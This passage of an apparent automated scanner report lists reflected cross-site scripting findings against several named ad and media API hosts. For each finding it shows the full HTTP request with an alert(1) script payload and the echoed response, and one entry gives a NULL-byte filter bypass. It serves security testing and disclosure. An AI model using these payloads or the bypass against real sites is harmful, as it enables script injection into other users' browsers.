Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGLflw6f2XKRfTtLleii8orkNcii8xtm6s0H0QqF2XHhrAYH2Y9gYaTlvlcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1EMdIdXxcQv1ExkNK7HUtFQY8D8EoTSfYed7OiiXiimUKQYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSvJB55ptYtaPdsnRGwuisv9sgNCHPPoPZ5lGIHcCOxxistyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZj6antyX3oWeUWjipXaLIwxMODCrIgmWLKYiiDGTipqiiCrEEI9eqbqVZ4MODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDzCvipnduuyh7dsnRGwuisv9lgdLN2CDPvYnN3SaI2ZY7d4UaMHFipcKz0lXg8MBAcYvQJipLd4ekU1f7MrQxrTtB1awN4NttI9ipMydkER68R1V1OiijTzGXiiboVarOcnmT09ciscCQ9N26R8nipxJ2jUNr57XvbckI43H8V9NXzJIXKwEOngHh2VamB2EXVXtg7b5stvcAWXzmjMHHvxUvUolOIqHLDnHii2Cip8QsPMip8WtDDSUrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmiiSGdip3ZDoZhGOAhZEwDNkhm2KROdrHzEWJkNyCeo9TMuoVcehkhLzzCCiiJrWm3g8yb3nqWIisiiis82c5lEROZWfllzeJyA5jHNe8JGn3rPyXs2c5lEROZWfpSxisuiiAPV3D

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:21:49 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (8dn4jnyemg4ky9svqgs28wds73bbb<script>alert(1)</script>6a653815b0a)

1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload aa726<script>alert(1)</script>84d30c56979 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=aa726<script>alert(1)</script>84d30c56979 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=15; BizoID=b67e419b-0f67-49a8-9374-7947627c8dff; BizoData=...[SNIP]...

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:21:51 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: aa726<script>alert(1)</script>84d30c56979

1.53. http://api.kickapps.com/rest/comments/62976 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.kickapps.com
Path:   /rest/comments/62976

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ad4e3<script>alert(1)</script>98d73742cf0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rest/comments/62976?pgNum=1&pageSize=1&url=http%3A//www.wptz.com/news/27483035/detail.html&t=0SD0svP/Zk58tfSWXNJ/thuqOKP802x3&mediaType=emedia&userId=0&callback=IBSYS.hrst.commentCount.onKACommentDataad4e3<script>alert(1)</script>98d73742cf0 HTTP/1.1
Host: api.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Sat, 09 Apr 2011 12:31:30 GMT
Server: Noelios-Restlet-Engine/1.0..11
Content-Language: *
Content-Type: text/plain;charset=UTF-8
Content-Length: 167

IBSYS.hrst.commentCount.onKACommentDataad4e3<script>alert(1)</script>98d73742cf0({"totSize":0,"payload_type":"json","status":"1","results":[],"error":"","totPages":0})

1.54. http://api.zap2it.com/tvlistings/ZCShowtimeAction.do [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/ZCShowtimeAction.do

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00474b3'%3balert(1)//fa25becbfb0 was submitted in the aid parameter. This input was echoed as 474b3';alert(1)//fa25becbfb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tvlistings/ZCShowtimeAction.do?ap=wo&md=getPrimetimeWhatsOn&v=2&aid=wptzdt2%00474b3'%3balert(1)//fa25becbfb0&zip=12901&stnlt=53393 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: public
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: must-revalidate, max-age=0, post-check=0, pre-check=0
Expires: Sat, 09 Apr 2011 12:30:01 GMT
Date: Sat, 09 Apr 2011 12:30:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
e(obj, 'd', 'PDF Document', 'Default Grid View');
zc.openPrintPage();
}

dfpKeyValues='';
var ty='';
var z = 'default';
var dfp_zip='';
var dfp_aid='wptzdt2.474b3';alert(1)//fa25becbfb0';
var dfp_lid='';

</script>
...[SNIP]...

1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 4c6c5<script>alert(1)</script>2e6cc7273d9 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=84c6c5<script>alert(1)</script>2e6cc7273d9&c2=6820648&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"84c6c5<script>alert(1)</script>2e6cc7273d9", c2:"6820648", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload d6794<script>alert(1)</script>7f680a795f was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=d6794<script>alert(1)</script>7f680a795f&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 18 Apr 2011 17:41:23 GMT
Date: Mon, 11 Apr 2011 17:41:23 GMT
Connection: close
Content-Length: 1233

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"d6794<script>alert(1)</script>7f680a795f", c15:"", c16:"", r:""});



1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 980ee<script>alert(1)</script>cda0329ceaa was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=980ee<script>alert(1)</script>cda0329ceaa HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 18 Apr 2011 17:41:23 GMT
Date: Mon, 11 Apr 2011 17:41:23 GMT
Connection: close
Content-Length: 1234

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"980ee<script>alert(1)</script>cda0329ceaa", c16:"", r:""});



1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3fefc<script>alert(1)</script>27501cbb4f9 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=68206483fefc<script>alert(1)</script>27501cbb4f9&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"68206483fefc<script>alert(1)</script>27501cbb4f9", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 8693d<script>alert(1)</script>cfac32cb3dd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=18693d<script>alert(1)</script>cfac32cb3dd&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"18693d<script>alert(1)</script>cfac32cb3dd", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 1b888<script>alert(1)</script>766fa601906 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=1&c4=1b888<script>alert(1)</script>766fa601906&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr